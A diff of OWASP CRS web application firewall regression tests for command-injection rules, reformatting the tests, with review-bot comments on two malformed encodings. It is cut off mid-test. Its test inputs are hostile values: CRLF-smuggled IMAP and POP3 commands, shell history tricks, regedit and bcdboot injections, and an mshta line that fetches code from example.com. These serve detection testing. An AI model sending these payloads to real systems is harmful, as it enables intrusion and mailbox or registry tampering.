932311-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aa002%20copy%202%3A4%20MEETING + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 4 desc: "IMAP COPY Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Just%20to%20remind%20you%20that%20I%20need%20to%20copy%20those%20documents + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 5 desc: "IMAP LIST Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA1%20list%20%22INBOX%2F%22%20%22%2A%22 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 6 desc: "IMAP LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20need%20the%20list%20%22ASAP%22 - 
version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=We%20need%20the%20list%20%22ASAP%22 + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 7 desc: "IMAP STORE Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0ad%20store%202%20%2BFLAGS%20%28%5CDeleted%29 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 8 desc: "IMAP STORE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 - version: HTTP/1.0 - output: - no_log_contains: id "932311" - - test_title: 932311-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0aLet%27s%20go%20to%20the%20store%20%28sale%20time%21%29 + version: HTTP/1.0 + output: + no_log_contains: id "932311" + - test_id: 9 desc: "IMAP SEARCH Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - 
data: | - textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA282%20SEARCH%20FLAGGED%20SINCE%201-Feb-1994%20NOT%20FROM%20%22Smith%22 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 10 desc: "IMAP SEARCH with CHARSET Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aZ001%20SEARCH%20CHARSET%20WINDOWS-1252%20DELETED%20SINCE%201-Feb-1994 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 11 desc: "IMAP SEARCH using TEXT Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA283%20SEARCH%20TEXT%20%22string%20not%20in%20mailbox%22 + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 12 desc: 
"IMAP SEARCH using CHARSET and range Command Injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D - version: HTTP/1.0 - output: - log_contains: id "932311" - - test_title: 932311-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=%0d%0aA284%20SEARCH%20CHARSET%20UTF-8%20TEXT%20%7B6%7D + version: HTTP/1.0 + output: + log_contains: id "932311" + - test_id: 13 desc: "IMAP SEARCH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. - version: HTTP/1.0 - output: - no_log_contains: id "932311" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=In%20all%20search%20keys%20that%20use%20strings%2C%20a%20message%20matches%20the%20key%20if%20the%20string%20is%20a%20substring%20of%20the%20field.%20%20The%20matching%20is%20case-insensitive. + version: HTTP/1.0 + output: + no_log_contains: id "932311" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml index 34be803b8..ac2fcaab7 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932320.yaml 
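Review bot: The negative test 2 request `uri: "/get?text=We%examine%20this%20mail%20from%20Mars"` contains `%ex`, which is not a valid percent-escape, so the stage exercises malformed URL encoding rather than the sentence the description names, and a server or engine may treat the bad escape differently before this rule is reached. `uri: "/get?text=We%20examine%20this%20mail%20from%20Mars"` looks like the intended value. This is pre-existing on the old side; if it is deliberate, a comment on the stage stating that would help.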
@@ -2,192 +2,180 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 Command Injection test cases" - enabled: true - name: 932320.yaml +rule_id: 932320 tests: - - test_title: 932320-1 + - test_id: 1 desc: "POP3 RETR/DELE Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRETR%20123" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRETR%20123" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 2 desc: "POP3 RETR Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Let%20me%20retrieve%2010%20of%20those" + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 3 desc: "POP3 DELE Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=We%20should%20delete%20nine - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 
textarea=We%20should%20delete%20nine + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 4 desc: "POP3 LIST Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0alist%203" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0alist%203" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 5 desc: "POP3 LIST Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=This%20text%20is%20a%20way%20of%20list%203%20things - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=This%20text%20is%20a%20way%20of%20list%203%20things + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 6 desc: "POP3 TOP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aTOP%201%202" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aTOP%201%202" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 7 desc: "POP3 TOP 
Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=These%20are%20top%10%20rules - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=These%20are%20top%10%20rules + version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 8 desc: "POP3 AUTH Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAUTH%20corerulest%20dGhpc2lzIWF0ZXN0cGFzc3dvcmQ=" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 9 desc: "POP3 AUTH Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! - version: HTTP/1.0 - output: - no_log_contains: id "932320" - - test_title: 932320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hey%2C%20sent%20me%20those%20auth%20codes%20please! 
+ version: HTTP/1.0 + output: + no_log_contains: id "932320" + - test_id: 10 desc: "POP3 APOP Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" - version: HTTP/1.0 - output: - log_contains: id "932320" - - test_title: 932320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aAPOP%20corerulest%207d0a3bd8e5b2abcfb3e256633c23b891" + version: HTTP/1.0 + output: + log_contains: id "932320" + - test_id: 11 desc: "POP3 APOP Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Look%2C%20apop%20star! - version: HTTP/1.0 - output: - no_log_contains: id "932320" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Look%2C%20apop%20star! + version: HTTP/1.0 + output: + no_log_contains: id "932320" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml index e8f786a99..d5afc429e 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932321.yaml 
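Review bot: The negative test 7 body `textarea=These%20are%20top%10%20rules` encodes `%10`, which decodes to a 0x10 control byte instead of the `10` the sentence reads as, so the stage does not test the "top 10" phrasing the description implies. `textarea=These%20are%20top%2010%20rules` is presumably what was meant. The value is unchanged from the old side, so this may be intentionally left alone in a format-only change.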
@@ -2,108 +2,101 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: POP3 PL3 Command Injection test cases" - enabled: true - name: 932321.yaml +rule_id: 932321 tests: - - test_title: 932321-1 + - test_id: 1 desc: "POP3 QUIT/STAT/NOOP/RSET/CAPA Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aQUIT" - version: HTTP/1.0 - output: - log_contains: id "932321" - - test_title: 932321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aQUIT" + version: HTTP/1.0 + output: + log_contains: id "932321" + - test_id: 2 desc: "POP3 QUIT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=Don't%20quit" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=Don't%20quit" + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 3 desc: "POP3 CAPA Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=we%20do%20not%20have%20that%20capability - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 
textarea=we%20do%20not%20have%20that%20capability + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 4 desc: "POP3 STAT Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hi%20lestat! - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hi%20lestat! + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 5 desc: "POP3 NOOP Command injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0aSeriously%2C%20noop" - version: HTTP/1.0 - output: - no_log_contains: id "932321" - - test_title: 932321-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0aSeriously%2C%20noop" + version: HTTP/1.0 + output: + no_log_contains: id "932321" + - test_id: 6 desc: "POP3 RSET Command Injection negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Someone%20bought%20this%20nice%20lerset - version: HTTP/1.0 - output: - no_log_contains: id "932321" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Someone%20bought%20this%20nice%20lerset + version: HTTP/1.0 + output: + no_log_contains: id "932321" 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml index f3c86c781..5ddf01bf4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932330.yaml @@ -2,22 +2,20 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932330.yaml +rule_id: 932330 tests: - - test_title: 932330-1 + - test_id: 1 desc: "Unix shell history invocation: relative position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!-1!-2" - version: HTTP/1.0 - output: - log_contains: id "932330" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!-1!-2" + version: HTTP/1.0 + output: + log_contains: id "932330" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml index 4b8b11c2a..c9e823dee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932331.yaml 
@@ -2,38 +2,35 @@ meta: author: "karelorigin, azurit" description: "Remote Command Execution: Unix shell history invocation" - enabled: true - name: 932331.yaml +rule_id: 932331 tests: - - test_title: 932331-1 + - test_id: 1 desc: "Unix shell history invocation: absolute position" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!1" - version: HTTP/1.0 - output: - log_contains: id "932331" - - test_title: 932331-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!1" + version: HTTP/1.0 + output: + log_contains: id "932331" + - test_id: 2 desc: "Unix shell history invocation: last command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=!!" - version: HTTP/1.0 - output: - log_contains: id "932331" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=!!" + version: HTTP/1.0 + output: + log_contains: id "932331" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml index 5b3ca8ddf..7801af2f9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml 
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932370.yaml 
@@ -2,75 +2,70 @@ meta: author: "airween, Franziska Bühler, azurit" description: "Remote Command Execution: Windows Command Injection test cases" - enabled: true - name: 932370.yaml +rule_id: 932370 tests: - - test_title: 932370-1 + - test_id: 1 desc: "Windows Command Injection true positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" - uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey" + uri: "/get?cmd%3D%3B%20regedit%20%2FE%20c%3A%5Cads%5Cfile.txt%3Aregfile.reg%20HKEY_CURRENT_USER%5CMyCustomRegKey" + version: HTTP/1.0 + output: + log_contains: id "932370" + - test_id: 2 desc: "Windows Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=regedit " - uri: "/get?cmd=regedit%20" - version: HTTP/1.0 - output: - no_log_contains: id "932370" - - test_title: 932370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + method: GET + port: 80 + # "cmd=regedit " + uri: "/get?cmd=regedit%20" + version: HTTP/1.0 + output: + no_log_contains: id "932370" + - test_id: 3 desc: "Windows Command Injection - bypass test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # "cmd=; mshta http://example.com" - uri: "/get?cmd=;%20mshta%20http://example.com" - version: HTTP/1.0 - output: - log_contains: id "932370" - - test_title: 932370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # "cmd=; mshta http://example.com" + uri: "/get?cmd=;%20mshta%20http://example.com" + version: HTTP/1.0 + output: + log_contains: id "932370" + - test_id: 4 desc: Windows Command Injection bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + no_log_contains: id "932370" 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml index 5e5f82e1b..322c01ee4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932380.yaml 
@@ -2,175 +2,165 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: Windows shell command injections - enabled: true - name: 932380.yaml +rule_id: 932380 tests: - - test_title: 932380-1 + - test_id: 1 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot < file.txt Match input redirection to bcdboot stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" - version: HTTP/1.0 - output: - log_contains: id "932380" - - test_title: 932380-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?view%3Dimage.jpg%26bcdboot%20%3C%20file.txt" + version: HTTP/1.0 + output: + log_contains: id "932380" + - test_id: 2 desc: | Windows shell command injection with 'bcdboot': view=image.jpg%26bcdboot /r file.txt Match bcdboot with normal argument stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 